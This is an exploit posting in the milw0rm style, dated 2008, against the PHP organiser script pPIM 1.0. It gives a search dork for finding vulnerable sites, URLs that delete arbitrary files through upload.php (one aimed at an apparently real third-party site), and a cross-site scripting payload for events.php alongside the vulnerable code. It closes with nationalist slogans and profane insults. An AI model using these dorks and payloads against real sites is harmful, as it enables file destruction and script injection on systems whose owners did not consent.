pPIM 1.0 - Arbitrary File Delete / Cross-Site Scripting



Platform:

PHP

Date:

2008-08-10


##########################################################
#Author : BeyazKurt
#Contact : Djm-sut@Hotmail.Com
#
#Script : Ppim v1.0 [Bu ne bicim script adidir amk :D ]
#Download : http://scripts.ringsworld.com/organizers/ppim.zip
#
# D0rk :  inurl:events.php?listallevents
#
# File Delete Vulnerability: upload.php
#
# Example:http://creawebs.com.mx/sistema/upload.php?mode=delfile&file=Creando Wiki.pptx
# Exploit:http://SITE.COM/upload.php?mode=delfile&file=FileName
#
# $$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$
#
# XSS Vulnerability: events.php
#
#[CODE]
#  <?php
#  if (isset($_GET['date']))
#  {
#    $date_id = $_GET['date'];
#  print "<a href=\"events.php?mode=new&date=$date_id\">New Event</a><br / >";
#  }
#  ?>
#[/CODE]
#
#Exploit :
# events.php?mode=new&date=XSS CODE
# events.php?mode=new&date="><script>alert('XSS')</script>
# -------------------------------
#
#              INDEPENDENT KOSOVA (H) - Etnic ALBANIA (H)
#  pigs for dedication : :  WE Are Don't Forget Kosova, Drenica, Srebrenica And All Genocide !!
#                      Proud 2 Be ALBANIAN
#
# MTK : 0 - 5 : FenerBahçe (H)
#
# Not : Fuck off pala! aq lameri.
# Thnx : All Muslims Albanian & Turkish Coder.. And CrazyShark f0r translate.
#######################################################

# milw0rm.com [2008-08-10]